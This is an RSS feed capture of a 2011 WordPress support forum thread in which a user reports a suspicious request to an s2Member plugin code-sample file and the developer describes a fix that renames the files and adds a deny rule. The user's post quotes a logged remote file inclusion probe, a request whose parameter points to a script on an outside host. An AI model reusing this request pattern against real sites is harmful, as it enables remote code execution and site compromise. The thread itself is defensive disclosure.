Community Support Forums — WordPress® ( Users Helping Users ) — 2011-11-22T14:22:37-05:00 http://www.primothemes.com/forums/feed.php?f=4&t=15330 2011-11-22T14:22:37-05:00 http://www.primothemes.com/forums/viewtopic.php?t=15330&p=53698#p53698 <![CDATA[Re: possible security problem]]> Statistics: Posted by Deyson — November 22nd, 2011, 2:22 pm


]]>
2011-10-01T20:00:23-05:00 http://www.primothemes.com/forums/viewtopic.php?t=15330&p=42104#p42104 <![CDATA[Re: possible security problem]]> Thanks for reporting this important issue.
~ I'm having this addressed in the next release.

* (s2Member) **Security fix**. It was possible for some of s2Member's code sample files to be executed directly. Not a proven vulnerability, but definitely NOT a good idea to allow this either. Fixed in this release, by renaming all `.php` files inside the `/includes/menu-pages/code-samples/` directory. These files now have a `.x-php` extension. As an additional line of defense, a new `.htaccess` file with `deny from all` is automatically placed inside the main `/s2member/includes/` directory. None of these files should be available pulicly anyway. s2Member's exsiting `realpath()` file scans remain in place too, which further prevents the direct execution of `.php` files.

Statistics: Posted by Jason Caldwell — October 1st, 2011, 8:00 pm


]]>
2011-09-29T02:00:55-05:00 http://www.primothemes.com/forums/viewtopic.php?t=15330&p=41893#p41893 <![CDATA[Re: possible security problem]]>

Statistics: Posted by Cristián Lávaque — September 29th, 2011, 2:00 am


]]>
2011-09-27T16:34:23-05:00 http://www.primothemes.com/forums/viewtopic.php?t=15330&p=41715#p41715 <![CDATA[possible security problem]]>
plugins/s2member/includes/menu-pages/code-samples/current-user-login.php?varname=http://genshop.org/script/prostoparanoia/ras HTTP/1.1" 200 397 getting a 200 return which is a successful access. If I did not have security software in operation, this hacker would have hacked me again.

I know there is not much code on the page accessed but what an obscure place to bury a hacker code to do a site name hijack and add pages to Google index.

Statistics: Posted by coloradoflyfisherman — September 27th, 2011, 4:34 pm


]]>